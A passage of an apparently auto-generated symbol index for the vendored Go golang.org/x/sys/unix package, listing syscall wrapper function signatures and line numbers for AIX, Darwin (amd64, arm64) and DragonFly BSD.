_p0 uintptr, _lenp0 int) (r1 uintptr, e1 Errno) { function calldup2 (line 609) | func calldup2(oldfd int, newfd int) (r1 uintptr, e1 Errno) { function callposix_fadvise64 (line 617) | func callposix_fadvise64(fd int, offset int64, length int64, advice int)... function callfchown (line 625) | func callfchown(fd int, uid int, gid int) (r1 uintptr, e1 Errno) { function callfstat (line 633) | func callfstat(fd int, stat uintptr) (r1 uintptr, e1 Errno) { function callfstatat (line 641) | func callfstatat(dirfd int, _p0 uintptr, stat uintptr, flags int) (r1 ui... function callfstatfs (line 649) | func callfstatfs(fd int, buf uintptr) (r1 uintptr, e1 Errno) { function callftruncate (line 657) | func callftruncate(fd int, length int64) (r1 uintptr, e1 Errno) { function callgetegid (line 665) | func callgetegid() (r1 uintptr, e1 Errno) { function callgeteuid (line 673) | func callgeteuid() (r1 uintptr, e1 Errno) { function callgetgid (line 681) | func callgetgid() (r1 uintptr, e1 Errno) { function callgetuid (line 689) | func callgetuid() (r1 uintptr, e1 Errno) { function calllchown (line 697) | func calllchown(_p0 uintptr, uid int, gid int) (r1 uintptr, e1 Errno) { function calllisten (line 705) | func calllisten(s int, n int) (r1 uintptr, e1 Errno) { function calllstat (line 713) | func calllstat(_p0 uintptr, stat uintptr) (r1 uintptr, e1 Errno) { function callpause (line 721) | func callpause() (r1 uintptr, e1 Errno) { function callpread64 (line 729) | func callpread64(fd int, _p0 uintptr, _lenp0 int, offset int64) (r1 uint... function callpwrite64 (line 737) | func callpwrite64(fd int, _p0 uintptr, _lenp0 int, offset int64) (r1 uin... function callselect (line 745) | func callselect(nfd int, r uintptr, w uintptr, e uintptr, timeout uintpt... function callpselect (line 753) | func callpselect(nfd int, r uintptr, w uintptr, e uintptr, timeout uintp... function callsetregid (line 761) | func callsetregid(rgid int, egid int) (r1 uintptr, e1 Errno) { function callsetreuid (line 769) | func callsetreuid(ruid int, euid int) (r1 uintptr, e1 Errno) { function callshutdown (line 777) | func callshutdown(fd int, how int) (r1 uintptr, e1 Errno) { function callsplice (line 785) | func callsplice(rfd int, roff uintptr, wfd int, woff uintptr, len int, f... function callstat (line 793) | func callstat(_p0 uintptr, statptr uintptr) (r1 uintptr, e1 Errno) { function callstatfs (line 801) | func callstatfs(_p0 uintptr, buf uintptr) (r1 uintptr, e1 Errno) { function calltruncate (line 809) | func calltruncate(_p0 uintptr, length int64) (r1 uintptr, e1 Errno) { function callbind (line 817) | func callbind(s int, addr uintptr, addrlen uintptr) (r1 uintptr, e1 Errn... function callconnect (line 825) | func callconnect(s int, addr uintptr, addrlen uintptr) (r1 uintptr, e1 E... function callgetgroups (line 833) | func callgetgroups(n int, list uintptr) (r1 uintptr, e1 Errno) { function callsetgroups (line 841) | func callsetgroups(n int, list uintptr) (r1 uintptr, e1 Errno) { function callgetsockopt (line 849) | func callgetsockopt(s int, level int, name int, val uintptr, vallen uint... function callsetsockopt (line 857) | func callsetsockopt(s int, level int, name int, val uintptr, vallen uint... function callsocket (line 865) | func callsocket(domain int, typ int, proto int) (r1 uintptr, e1 Errno) { function callsocketpair (line 873) | func callsocketpair(domain int, typ int, proto int, fd uintptr) (r1 uint... function callgetpeername (line 881) | func callgetpeername(fd int, rsa uintptr, addrlen uintptr) (r1 uintptr, ... function callgetsockname (line 889) | func callgetsockname(fd int, rsa uintptr, addrlen uintptr) (r1 uintptr, ... function callrecvfrom (line 897) | func callrecvfrom(fd int, _p0 uintptr, _lenp0 int, flags int, from uintp... function callsendto (line 905) | func callsendto(s int, _p0 uintptr, _lenp0 int, flags int, to uintptr, a... function callnrecvmsg (line 913) | func callnrecvmsg(s int, msg uintptr, flags int) (r1 uintptr, e1 Errno) { function callnsendmsg (line 921) | func callnsendmsg(s int, msg uintptr, flags int) (r1 uintptr, e1 Errno) { function callmunmap (line 929) | func callmunmap(addr uintptr, length uintptr) (r1 uintptr, e1 Errno) { function callmadvise (line 937) | func callmadvise(_p0 uintptr, _lenp0 int, advice int) (r1 uintptr, e1 Er... function callmprotect (line 945) | func callmprotect(_p0 uintptr, _lenp0 int, prot int) (r1 uintptr, e1 Err... function callmlock (line 953) | func callmlock(_p0 uintptr, _lenp0 int) (r1 uintptr, e1 Errno) { function callmlockall (line 961) | func callmlockall(flags int) (r1 uintptr, e1 Errno) { function callmsync (line 969) | func callmsync(_p0 uintptr, _lenp0 int, flags int) (r1 uintptr, e1 Errno) { function callmunlock (line 977) | func callmunlock(_p0 uintptr, _lenp0 int) (r1 uintptr, e1 Errno) { function callmunlockall (line 985) | func callmunlockall() (r1 uintptr, e1 Errno) { function callpipe (line 993) | func callpipe(p uintptr) (r1 uintptr, e1 Errno) { function callpoll (line 1001) | func callpoll(fds uintptr, nfds int, timeout int) (r1 uintptr, e1 Errno) { function callgettimeofday (line 1009) | func callgettimeofday(tv uintptr, tzp uintptr) (r1 uintptr, e1 Errno) { function calltime (line 1017) | func calltime(t uintptr) (r1 uintptr, e1 Errno) { function callutime (line 1025) | func callutime(_p0 uintptr, buf uintptr) (r1 uintptr, e1 Errno) { function callgetsystemcfg (line 1033) | func callgetsystemcfg(label int) (r1 uintptr, e1 Errno) { function callumount (line 1041) | func callumount(_p0 uintptr) (r1 uintptr, e1 Errno) { function callgetrlimit (line 1049) | func callgetrlimit(resource int, rlim uintptr) (r1 uintptr, e1 Errno) { function calllseek (line 1057) | func calllseek(fd int, offset int64, whence int) (r1 uintptr, e1 Errno) { function callmmap64 (line 1065) | func callmmap64(addr uintptr, length uintptr, prot int, flags int, fd in... FILE: vendor/golang.org/x/sys/unix/zsyscall_darwin_amd64.go function getgroups (line 17) | func getgroups(ngid int, gid *_Gid_t) (n int, err error) { function setgroups (line 32) | func setgroups(ngid int, gid *_Gid_t) (err error) { function wait4 (line 46) | func wait4(pid int, wstatus *_C_int, options int, rusage *Rusage) (wpid ... function accept (line 61) | func accept(s int, rsa *RawSockaddrAny, addrlen *_Socklen) (fd int, err ... function bind (line 76) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 90) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function socket (line 104) | func socket(domain int, typ int, proto int) (fd int, err error) { function getsockopt (line 119) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 133) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function getpeername (line 147) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 161) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function Shutdown (line 175) | func Shutdown(s int, how int) (err error) { function socketpair (line 189) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function recvfrom (line 203) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 224) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 244) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 259) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function kevent (line 274) | func kevent(kq int, change unsafe.Pointer, nchange int, event unsafe.Poi... function utimes (line 289) | func utimes(path string, timeval *[2]Timeval) (err error) { function futimes (line 308) | func futimes(fd int, timeval *[2]Timeval) (err error) { function poll (line 322) | func poll(fds *PollFd, nfds int, timeout int) (n int, err error) { function Madvise (line 337) | func Madvise(b []byte, behav int) (err error) { function Mlock (line 357) | func Mlock(b []byte) (err error) { function Mlockall (line 377) | func Mlockall(flags int) (err error) { function Mprotect (line 391) | func Mprotect(b []byte, prot int) (err error) { function Msync (line 411) | func Msync(b []byte, flags int) (err error) { function Munlock (line 431) | func Munlock(b []byte) (err error) { function Munlockall (line 451) | func Munlockall() (err error) { function closedir (line 465) | func closedir(dir uintptr) (err error) { function readdir_r (line 479) | func readdir_r(dir uintptr, entry *Dirent, result **Dirent) (res Errno) { function pipe (line 491) | func pipe(p *[2]int32) (err error) { function getxattr (line 505) | func getxattr(path string, attr string, dest *byte, size int, position u... function fgetxattr (line 530) | func fgetxattr(fd int, attr string, dest *byte, size int, position uint3... function setxattr (line 550) | func setxattr(path string, attr string, data *byte, size int, position u... function fsetxattr (line 574) | func fsetxattr(fd int, attr string, data *byte, size int, position uint3... function removexattr (line 593) | func removexattr(path string, attr string, options int) (err error) { function fremovexattr (line 617) | func fremovexattr(fd int, attr string, options int) (err error) { function listxattr (line 636) | func listxattr(path string, dest *byte, size int, options int) (sz int, ... function flistxattr (line 656) | func flistxattr(fd int, dest *byte, size int, options int) (sz int, err ... function utimensat (line 671) | func utimensat(dirfd int, path string, times *[2]Timespec, flags int) (e... function fcntl (line 690) | func fcntl(fd int, cmd int, arg int) (val int, err error) { function kill (line 705) | func kill(pid int, signum int, posix int) (err error) { function ioctl (line 719) | func ioctl(fd int, req uint, arg uintptr) (err error) { function ioctlPtr (line 733) | func ioctlPtr(fd int, req uint, arg unsafe.Pointer) (err error) { function sysctl (line 743) | func sysctl(mib []_C_int, old *byte, oldlen *uintptr, new *byte, newlen ... function sendfile (line 763) | func sendfile(infd int, outfd int, offset int64, len *int64, hdtr unsafe... function shmat (line 777) | func shmat(id int, addr uintptr, flag int) (ret uintptr, err error) { function shmctl (line 792) | func shmctl(id int, cmd int, buf *SysvShmDesc) (result int, err error) { function shmdt (line 807) | func shmdt(addr uintptr) (err error) { function shmget (line 821) | func shmget(key int, size int, flag int) (id int, err error) { function Access (line 836) | func Access(path string, mode uint32) (err error) { function Adjtime (line 855) | func Adjtime(delta *Timeval, olddelta *Timeval) (err error) { function Chdir (line 869) | func Chdir(path string) (err error) { function Chflags (line 888) | func Chflags(path string, flags int) (err error) { function Chmod (line 907) | func Chmod(path string, mode uint32) (err error) { function Chown (line 926) | func Chown(path string, uid int, gid int) (err error) { function Chroot (line 945) | func Chroot(path string) (err error) { function ClockGettime (line 964) | func ClockGettime(clockid int32, time *Timespec) (err error) { function Close (line 978) | func Close(fd int) (err error) { function Clonefile (line 992) | func Clonefile(src string, dst string, flags int) (err error) { function Clonefileat (line 1016) | func Clonefileat(srcDirfd int, src string, dstDirfd int, dst string, fla... function Dup (line 1040) | func Dup(fd int) (nfd int, err error) { function Dup2 (line 1055) | func Dup2(from int, to int) (err error) { function Exchangedata (line 1069) | func Exchangedata(path1 string, path2 string, options int) (err error) { function Exit (line 1093) | func Exit(code int) { function Faccessat (line 1104) | func Faccessat(dirfd int, path string, mode uint32, flags int) (err erro... function Fchdir (line 1123) | func Fchdir(fd int) (err error) { function Fchflags (line 1137) | func Fchflags(fd int, flags int) (err error) { function Fchmod (line 1151) | func Fchmod(fd int, mode uint32) (err error) { function Fchmodat (line 1165) | func Fchmodat(dirfd int, path string, mode uint32, flags int) (err error) { function Fchown (line 1184) | func Fchown(fd int, uid int, gid int) (err error) { function Fchownat (line 1198) | func Fchownat(dirfd int, path string, uid int, gid int, flags int) (err ... function Fclonefileat (line 1217) | func Fclonefileat(srcDirfd int, dstDirfd int, dst string, flags int) (er... function Flock (line 1236) | func Flock(fd int, how int) (err error) { function Fpathconf (line 1250) | func Fpathconf(fd int, name int) (val int, err error) { function Fsync (line 1265) | func Fsync(fd int) (err error) { function Ftruncate (line 1279) | func Ftruncate(fd int, length int64) (err error) { function Getcwd (line 1293) | func Getcwd(buf []byte) (n int, err error) { function Getdtablesize (line 1314) | func Getdtablesize() (size int) { function Getegid (line 1326) | func Getegid() (egid int) { function Geteuid (line 1338) | func Geteuid() (uid int) { function Getgid (line 1350) | func Getgid() (gid int) { function Getpgid (line 1362) | func Getpgid(pid int) (pgid int, err error) { function Getpgrp (line 1377) | func Getpgrp() (pgrp int) { function Getpid (line 1389) | func Getpid() (pid int) { function Getppid (line 1401) | func Getppid() (ppid int) { function Getpriority (line 1413) | func Getpriority(which int, who int) (prio int, err error) { function Getrlimit (line 1428) | func Getrlimit(which int, lim *Rlimit) (err error) { function Getrusage (line 1442) | func Getrusage(who int, rusage *Rusage) (err error) { function Getsid (line 1456) | func Getsid(pid int) (sid int, err error) { function Gettimeofday (line 1471) | func Gettimeofday(tp *Timeval) (err error) { function Getuid (line 1485) | func Getuid() (uid int) { function Issetugid (line 1497) | func Issetugid() (tainted bool) { function Kqueue (line 1509) | func Kqueue() (fd int, err error) { function Lchown (line 1524) | func Lchown(path string, uid int, gid int) (err error) { function Link (line 1543) | func Link(path string, link string) (err error) { function Linkat (line 1567) | func Linkat(pathfd int, path string, linkfd int, link string, flags int)... function Listen (line 1591) | func Listen(s int, backlog int) (err error) { function Mkdir (line 1605) | func Mkdir(path string, mode uint32) (err error) { function Mkdirat (line 1624) | func Mkdirat(dirfd int, path string, mode uint32) (err error) { function Mkfifo (line 1643) | func Mkfifo(path string, mode uint32) (err error) { function Mknod (line 1662) | func Mknod(path string, mode uint32, dev int) (err error) { function Mount (line 1681) | func Mount(fsType string, dir string, flags int, data unsafe.Pointer) (e... function Open (line 1705) | func Open(path string, mode int, perm uint32) (fd int, err error) { function Openat (line 1725) | func Openat(dirfd int, path string, mode int, perm uint32) (fd int, err ... function Pathconf (line 1745) | func Pathconf(path string, name int) (val int, err error) { function pread (line 1765) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 1786) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function read (line 1807) | func read(fd int, p []byte) (n int, err error) { function Readlink (line 1828) | func Readlink(path string, buf []byte) (n int, err error) { function Readlinkat (line 1854) | func Readlinkat(dirfd int, path string, buf []byte) (n int, err error) { function Rename (line 1880) | func Rename(from string, to string) (err error) { function Renameat (line 1904) | func Renameat(fromfd int, from string, tofd int, to string) (err error) { function Revoke (line 1928) | func Revoke(path string) (err error) { function Rmdir (line 1947) | func Rmdir(path string) (err error) { function Seek (line 1966) | func Seek(fd int, offset int64, whence int) (newoffset int64, err error) { function Select (line 1981) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function Setattrlist (line 1996) | func Setattrlist(path string, attrlist *Attrlist, attrBuf []byte, option... function Setegid (line 2021) | func Setegid(egid int) (err error) { function Seteuid (line 2035) | func Seteuid(euid int) (err error) { function Setgid (line 2049) | func Setgid(gid int) (err error) { function Setlogin (line 2063) | func Setlogin(name string) (err error) { function Setpgid (line 2082) | func Setpgid(pid int, pgid int) (err error) { function Setpriority (line 2096) | func Setpriority(which int, who int, prio int) (err error) { function Setprivexec (line 2110) | func Setprivexec(flag int) (err error) { function Setregid (line 2124) | func Setregid(rgid int, egid int) (err error) { function Setreuid (line 2138) | func Setreuid(ruid int, euid int) (err error) { function Setsid (line 2152) | func Setsid() (pid int, err error) { function Settimeofday (line 2167) | func Settimeofday(tp *Timeval) (err error) { function Setuid (line 2181) | func Setuid(uid int) (err error) { function Symlink (line 2195) | func Symlink(path string, link string) (err error) { function Symlinkat (line 2219) | func Symlinkat(oldpath string, newdirfd int, newpath string) (err error) { function Sync (line 2243) | func Sync() (err error) { function Truncate (line 2257) | func Truncate(path string, length int64) (err error) { function Umask (line 2276) | func Umask(newmask int) (oldmask int) { function Undelete (line 2288) | func Undelete(path string) (err error) { function Unlink (line 2307) | func Unlink(path string) (err error) { function Unlinkat (line 2326) | func Unlinkat(dirfd int, path string, flags int) (err error) { function Unmount (line 2345) | func Unmount(path string, flags int) (err error) { function write (line 2364) | func write(fd int, p []byte) (n int, err error) { function mmap (line 2385) | func mmap(addr uintptr, length uintptr, prot int, flag int, fd int, pos ... function munmap (line 2400) | func munmap(addr uintptr, length uintptr) (err error) { function Fstat (line 2414) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 2428) | func Fstatat(fd int, path string, stat *Stat_t, flags int) (err error) { function Fstatfs (line 2447) | func Fstatfs(fd int, stat *Statfs_t) (err error) { function getfsstat (line 2461) | func getfsstat(buf unsafe.Pointer, size uintptr, flags int) (n int, err ... function Lstat (line 2476) | func Lstat(path string, stat *Stat_t) (err error) { function ptrace1 (line 2495) | func ptrace1(request int, pid int, addr uintptr, data uintptr) (err erro... function Stat (line 2509) | func Stat(path string, stat *Stat_t) (err error) { function Statfs (line 2528) | func Statfs(path string, stat *Statfs_t) (err error) { FILE: vendor/golang.org/x/sys/unix/zsyscall_darwin_arm64.go function getgroups (line 17) | func getgroups(ngid int, gid *_Gid_t) (n int, err error) { function setgroups (line 32) | func setgroups(ngid int, gid *_Gid_t) (err error) { function wait4 (line 46) | func wait4(pid int, wstatus *_C_int, options int, rusage *Rusage) (wpid ... function accept (line 61) | func accept(s int, rsa *RawSockaddrAny, addrlen *_Socklen) (fd int, err ... function bind (line 76) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 90) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function socket (line 104) | func socket(domain int, typ int, proto int) (fd int, err error) { function getsockopt (line 119) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 133) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function getpeername (line 147) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 161) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function Shutdown (line 175) | func Shutdown(s int, how int) (err error) { function socketpair (line 189) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function recvfrom (line 203) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 224) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 244) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 259) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function kevent (line 274) | func kevent(kq int, change unsafe.Pointer, nchange int, event unsafe.Poi... function utimes (line 289) | func utimes(path string, timeval *[2]Timeval) (err error) { function futimes (line 308) | func futimes(fd int, timeval *[2]Timeval) (err error) { function poll (line 322) | func poll(fds *PollFd, nfds int, timeout int) (n int, err error) { function Madvise (line 337) | func Madvise(b []byte, behav int) (err error) { function Mlock (line 357) | func Mlock(b []byte) (err error) { function Mlockall (line 377) | func Mlockall(flags int) (err error) { function Mprotect (line 391) | func Mprotect(b []byte, prot int) (err error) { function Msync (line 411) | func Msync(b []byte, flags int) (err error) { function Munlock (line 431) | func Munlock(b []byte) (err error) { function Munlockall (line 451) | func Munlockall() (err error) { function closedir (line 465) | func closedir(dir uintptr) (err error) { function readdir_r (line 479) | func readdir_r(dir uintptr, entry *Dirent, result **Dirent) (res Errno) { function pipe (line 491) | func pipe(p *[2]int32) (err error) { function getxattr (line 505) | func getxattr(path string, attr string, dest *byte, size int, position u... function fgetxattr (line 530) | func fgetxattr(fd int, attr string, dest *byte, size int, position uint3... function setxattr (line 550) | func setxattr(path string, attr string, data *byte, size int, position u... function fsetxattr (line 574) | func fsetxattr(fd int, attr string, data *byte, size int, position uint3... function removexattr (line 593) | func removexattr(path string, attr string, options int) (err error) { function fremovexattr (line 617) | func fremovexattr(fd int, attr string, options int) (err error) { function listxattr (line 636) | func listxattr(path string, dest *byte, size int, options int) (sz int, ... function flistxattr (line 656) | func flistxattr(fd int, dest *byte, size int, options int) (sz int, err ... function utimensat (line 671) | func utimensat(dirfd int, path string, times *[2]Timespec, flags int) (e... function fcntl (line 690) | func fcntl(fd int, cmd int, arg int) (val int, err error) { function kill (line 705) | func kill(pid int, signum int, posix int) (err error) { function ioctl (line 719) | func ioctl(fd int, req uint, arg uintptr) (err error) { function ioctlPtr (line 733) | func ioctlPtr(fd int, req uint, arg unsafe.Pointer) (err error) { function sysctl (line 743) | func sysctl(mib []_C_int, old *byte, oldlen *uintptr, new *byte, newlen ... function sendfile (line 763) | func sendfile(infd int, outfd int, offset int64, len *int64, hdtr unsafe... function shmat (line 777) | func shmat(id int, addr uintptr, flag int) (ret uintptr, err error) { function shmctl (line 792) | func shmctl(id int, cmd int, buf *SysvShmDesc) (result int, err error) { function shmdt (line 807) | func shmdt(addr uintptr) (err error) { function shmget (line 821) | func shmget(key int, size int, flag int) (id int, err error) { function Access (line 836) | func Access(path string, mode uint32) (err error) { function Adjtime (line 855) | func Adjtime(delta *Timeval, olddelta *Timeval) (err error) { function Chdir (line 869) | func Chdir(path string) (err error) { function Chflags (line 888) | func Chflags(path string, flags int) (err error) { function Chmod (line 907) | func Chmod(path string, mode uint32) (err error) { function Chown (line 926) | func Chown(path string, uid int, gid int) (err error) { function Chroot (line 945) | func Chroot(path string) (err error) { function ClockGettime (line 964) | func ClockGettime(clockid int32, time *Timespec) (err error) { function Close (line 978) | func Close(fd int) (err error) { function Clonefile (line 992) | func Clonefile(src string, dst string, flags int) (err error) { function Clonefileat (line 1016) | func Clonefileat(srcDirfd int, src string, dstDirfd int, dst string, fla... function Dup (line 1040) | func Dup(fd int) (nfd int, err error) { function Dup2 (line 1055) | func Dup2(from int, to int) (err error) { function Exchangedata (line 1069) | func Exchangedata(path1 string, path2 string, options int) (err error) { function Exit (line 1093) | func Exit(code int) { function Faccessat (line 1104) | func Faccessat(dirfd int, path string, mode uint32, flags int) (err erro... function Fchdir (line 1123) | func Fchdir(fd int) (err error) { function Fchflags (line 1137) | func Fchflags(fd int, flags int) (err error) { function Fchmod (line 1151) | func Fchmod(fd int, mode uint32) (err error) { function Fchmodat (line 1165) | func Fchmodat(dirfd int, path string, mode uint32, flags int) (err error) { function Fchown (line 1184) | func Fchown(fd int, uid int, gid int) (err error) { function Fchownat (line 1198) | func Fchownat(dirfd int, path string, uid int, gid int, flags int) (err ... function Fclonefileat (line 1217) | func Fclonefileat(srcDirfd int, dstDirfd int, dst string, flags int) (er... function Flock (line 1236) | func Flock(fd int, how int) (err error) { function Fpathconf (line 1250) | func Fpathconf(fd int, name int) (val int, err error) { function Fsync (line 1265) | func Fsync(fd int) (err error) { function Ftruncate (line 1279) | func Ftruncate(fd int, length int64) (err error) { function Getcwd (line 1293) | func Getcwd(buf []byte) (n int, err error) { function Getdtablesize (line 1314) | func Getdtablesize() (size int) { function Getegid (line 1326) | func Getegid() (egid int) { function Geteuid (line 1338) | func Geteuid() (uid int) { function Getgid (line 1350) | func Getgid() (gid int) { function Getpgid (line 1362) | func Getpgid(pid int) (pgid int, err error) { function Getpgrp (line 1377) | func Getpgrp() (pgrp int) { function Getpid (line 1389) | func Getpid() (pid int) { function Getppid (line 1401) | func Getppid() (ppid int) { function Getpriority (line 1413) | func Getpriority(which int, who int) (prio int, err error) { function Getrlimit (line 1428) | func Getrlimit(which int, lim *Rlimit) (err error) { function Getrusage (line 1442) | func Getrusage(who int, rusage *Rusage) (err error) { function Getsid (line 1456) | func Getsid(pid int) (sid int, err error) { function Gettimeofday (line 1471) | func Gettimeofday(tp *Timeval) (err error) { function Getuid (line 1485) | func Getuid() (uid int) { function Issetugid (line 1497) | func Issetugid() (tainted bool) { function Kqueue (line 1509) | func Kqueue() (fd int, err error) { function Lchown (line 1524) | func Lchown(path string, uid int, gid int) (err error) { function Link (line 1543) | func Link(path string, link string) (err error) { function Linkat (line 1567) | func Linkat(pathfd int, path string, linkfd int, link string, flags int)... function Listen (line 1591) | func Listen(s int, backlog int) (err error) { function Mkdir (line 1605) | func Mkdir(path string, mode uint32) (err error) { function Mkdirat (line 1624) | func Mkdirat(dirfd int, path string, mode uint32) (err error) { function Mkfifo (line 1643) | func Mkfifo(path string, mode uint32) (err error) { function Mknod (line 1662) | func Mknod(path string, mode uint32, dev int) (err error) { function Mount (line 1681) | func Mount(fsType string, dir string, flags int, data unsafe.Pointer) (e... function Open (line 1705) | func Open(path string, mode int, perm uint32) (fd int, err error) { function Openat (line 1725) | func Openat(dirfd int, path string, mode int, perm uint32) (fd int, err ... function Pathconf (line 1745) | func Pathconf(path string, name int) (val int, err error) { function pread (line 1765) | func pread(fd int, p []byte, offset int64) (n int, err error) { function pwrite (line 1786) | func pwrite(fd int, p []byte, offset int64) (n int, err error) { function read (line 1807) | func read(fd int, p []byte) (n int, err error) { function Readlink (line 1828) | func Readlink(path string, buf []byte) (n int, err error) { function Readlinkat (line 1854) | func Readlinkat(dirfd int, path string, buf []byte) (n int, err error) { function Rename (line 1880) | func Rename(from string, to string) (err error) { function Renameat (line 1904) | func Renameat(fromfd int, from string, tofd int, to string) (err error) { function Revoke (line 1928) | func Revoke(path string) (err error) { function Rmdir (line 1947) | func Rmdir(path string) (err error) { function Seek (line 1966) | func Seek(fd int, offset int64, whence int) (newoffset int64, err error) { function Select (line 1981) | func Select(nfd int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (n ... function Setattrlist (line 1996) | func Setattrlist(path string, attrlist *Attrlist, attrBuf []byte, option... function Setegid (line 2021) | func Setegid(egid int) (err error) { function Seteuid (line 2035) | func Seteuid(euid int) (err error) { function Setgid (line 2049) | func Setgid(gid int) (err error) { function Setlogin (line 2063) | func Setlogin(name string) (err error) { function Setpgid (line 2082) | func Setpgid(pid int, pgid int) (err error) { function Setpriority (line 2096) | func Setpriority(which int, who int, prio int) (err error) { function Setprivexec (line 2110) | func Setprivexec(flag int) (err error) { function Setregid (line 2124) | func Setregid(rgid int, egid int) (err error) { function Setreuid (line 2138) | func Setreuid(ruid int, euid int) (err error) { function Setsid (line 2152) | func Setsid() (pid int, err error) { function Settimeofday (line 2167) | func Settimeofday(tp *Timeval) (err error) { function Setuid (line 2181) | func Setuid(uid int) (err error) { function Symlink (line 2195) | func Symlink(path string, link string) (err error) { function Symlinkat (line 2219) | func Symlinkat(oldpath string, newdirfd int, newpath string) (err error) { function Sync (line 2243) | func Sync() (err error) { function Truncate (line 2257) | func Truncate(path string, length int64) (err error) { function Umask (line 2276) | func Umask(newmask int) (oldmask int) { function Undelete (line 2288) | func Undelete(path string) (err error) { function Unlink (line 2307) | func Unlink(path string) (err error) { function Unlinkat (line 2326) | func Unlinkat(dirfd int, path string, flags int) (err error) { function Unmount (line 2345) | func Unmount(path string, flags int) (err error) { function write (line 2364) | func write(fd int, p []byte) (n int, err error) { function mmap (line 2385) | func mmap(addr uintptr, length uintptr, prot int, flag int, fd int, pos ... function munmap (line 2400) | func munmap(addr uintptr, length uintptr) (err error) { function Fstat (line 2414) | func Fstat(fd int, stat *Stat_t) (err error) { function Fstatat (line 2428) | func Fstatat(fd int, path string, stat *Stat_t, flags int) (err error) { function Fstatfs (line 2447) | func Fstatfs(fd int, stat *Statfs_t) (err error) { function getfsstat (line 2461) | func getfsstat(buf unsafe.Pointer, size uintptr, flags int) (n int, err ... function Lstat (line 2476) | func Lstat(path string, stat *Stat_t) (err error) { function ptrace1 (line 2495) | func ptrace1(request int, pid int, addr uintptr, data uintptr) (err erro... function Stat (line 2509) | func Stat(path string, stat *Stat_t) (err error) { function Statfs (line 2528) | func Statfs(path string, stat *Statfs_t) (err error) { FILE: vendor/golang.org/x/sys/unix/zsyscall_dragonfly_amd64.go function getgroups (line 17) | func getgroups(ngid int, gid *_Gid_t) (n int, err error) { function setgroups (line 28) | func setgroups(ngid int, gid *_Gid_t) (err error) { function wait4 (line 38) | func wait4(pid int, wstatus *_C_int, options int, rusage *Rusage) (wpid ... function accept (line 49) | func accept(s int, rsa *RawSockaddrAny, addrlen *_Socklen) (fd int, err ... function bind (line 60) | func bind(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function connect (line 70) | func connect(s int, addr unsafe.Pointer, addrlen _Socklen) (err error) { function socket (line 80) | func socket(domain int, typ int, proto int) (fd int, err error) { function getsockopt (line 91) | func getsockopt(s int, level int, name int, val unsafe.Pointer, vallen *... function setsockopt (line 101) | func setsockopt(s int, level int, name int, val unsafe.Pointer, vallen u... function getpeername (line 111) | func getpeername(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function getsockname (line 121) | func getsockname(fd int, rsa *RawSockaddrAny, addrlen *_Socklen) (err er... function Shutdown (line 131) | func Shutdown(s int, how int) (err error) { function socketpair (line 141) | func socketpair(domain int, typ int, proto int, fd *[2]int32) (err error) { function recvfrom (line 151) | func recvfrom(fd int, p []byte, flags int, from *RawSockaddrAny, fromlen... function sendto (line 168) | func sendto(s int, buf []byte, flags int, to unsafe.Pointer, addrlen _So... function recvmsg (line 184) | func recvmsg(s int, msg *Msghdr, flags int) (n int, err error) { function sendmsg (line 195) | func sendmsg(s int, msg *Msghdr, flags int) (n int, err error) { function kevent (line 206) | func kevent(kq int, change unsafe.Pointer, nchange int, event unsafe.Poi... function utimes (line 217) | func utimes(path string, timeval *[2]Timeval) (err error) { function futimes (line 232) | func futimes(fd int, timeval *[2]Timeval) (err error) { function poll (line 242) | func poll(fds *PollFd, nfds int, timeout int) (n int, err error) { function Madvise (line 253) | func Madvise(b []byte, behav int) (err error) { function Mlock (line 269) | func Mlock(b []byte) (err error) { function Mlockall (line 285) | func Mlockall(flags int) (err error) { function Mprotect (line 295) | func Mprotect(b []byte, prot int) (err error) { function Msync (line 311) | func Msync(b []byte, flags int) (err error) { function Munlock (line 327) | func Munlock(b []byte) (err error) { function Munlockall (line 343) | func Munlockall() (err error) { function pipe (line 353) | func pipe() (r int, w int, err error) { function pipe2 (line 365) | func pipe2(p *[2]_C_int, flags int) (r int, w int, err error) { function extpread (line 377) | func extpread(fd int, p []byte, flags int, offset int64) (n int, err err... function extpwrite (line 394) | func extpwrite(fd int, p []byte, flags int, offset int64) (n int, err er... function Getcwd (line 411) | func Getcwd(buf []byte) (n int, err error) { function ioctl (line 428) | func ioctl(fd int, req uint, arg uintptr) (err error) { function ioctlPtr (line 438) | func ioctlPtr(fd int, req uint, arg unsafe.Pointer) (err error) { function sysctl (line 448) | func sysctl(mib []_C_int, old *byte, oldlen *uintptr, new *byte, newlen ... function Access (line 464) | func Access(path string, mode uint32) (err error) { function Adjtime (line 479) | func Adjtime(delta *Timeval, olddelta *Timeval) (err 